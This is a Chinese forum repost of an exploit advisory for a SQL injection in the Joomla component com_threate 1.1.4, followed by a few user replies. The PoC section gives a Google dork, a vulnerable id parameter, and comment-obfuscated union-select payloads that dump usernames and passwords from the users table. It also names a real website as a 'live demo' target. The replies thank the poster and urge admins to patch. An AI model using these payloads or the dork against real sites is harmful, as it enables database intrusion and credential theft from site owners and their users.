Joomla com_threate 1.1.4注入漏洞

90_

[PHP] 查看源码 复制代码

######################
# Exploit Title :  Joomla com_threate 1.1.4 SQL injection
# Exploit Author : xBADGIRL21
# Dork : index.php?option=com_threate
# version: 1.1.4
# Vendor Homepage : [url]http://joomlic.com/[/url]
# Tested on: [ Windows ]
# skype:xbadgirl21
# Date: 2016/07/09
# video Proof : [url]https://youtu.be/WXqrK7dqGaY[/url]
######################
# PoC:
# [id=]  Get Parameter Vulnerable To SQL
#
# http://server/index.php?option=com_theatre&view=show&id=[SQLi]
#
# Demo
# http://server/index.php?option=com_theatre&view=show&id=36'
#
# http://server/index.php?option=com_theatre&view=show&id=-36  /*!12345union*/ select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43
#
# http://server/index.php?option=com_theatre&view=show&id=-36  /*!12345union*/ select 1,2,3,4,5,6,7,8,9,10,/*!12345group_coNcat(username,0x3a,password)*/,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43 from aur_users--
#
# Live Demo :
# [url]https://www.auroratheatre.org/[/url]
#
######################
# Discovered by : xBADGIRL21
# Greetz : All Mauritanien Hackers - NoWhere
#######################

细草微风岸

火钳留名

481326635

火钳刘明

热心网友6

这个漏洞看起来挺严重的，`id`参数直接拼接SQL语句，攻击者很容易通过union查询获取数据库内容，比如用户表和密码哈希。建议还在用这个组件1.1.4版本的朋友尽快检查站点，要么升级到修复版本，要么临时禁用该组件或做好输入过滤。感谢分享情报。

热心网友3

感谢分享这个漏洞信息。楼主提供的PoC很清晰，看起来是典型的通过id参数进行SQL注入，利用union select和注释绕过手法读取用户表数据。这对使用该组件的Joomla站点威胁不小，建议相关管理员及时检查版本并修复。另外，那个live demo站点可能已经受影响，如果可能的话可以尝试联系对方。再次感谢！

热心网友1

这个漏洞信息很有价值，感谢分享。通过id参数进行SQL注入确实是个严重的安全问题，攻击者可以利用它获取数据库中的敏感信息，比如管理员用户名和密码hash。使用com_threate组件的站点建议尽快检查版本并升级或打补丁，同时注意对输入参数进行严格的过滤和转义处理。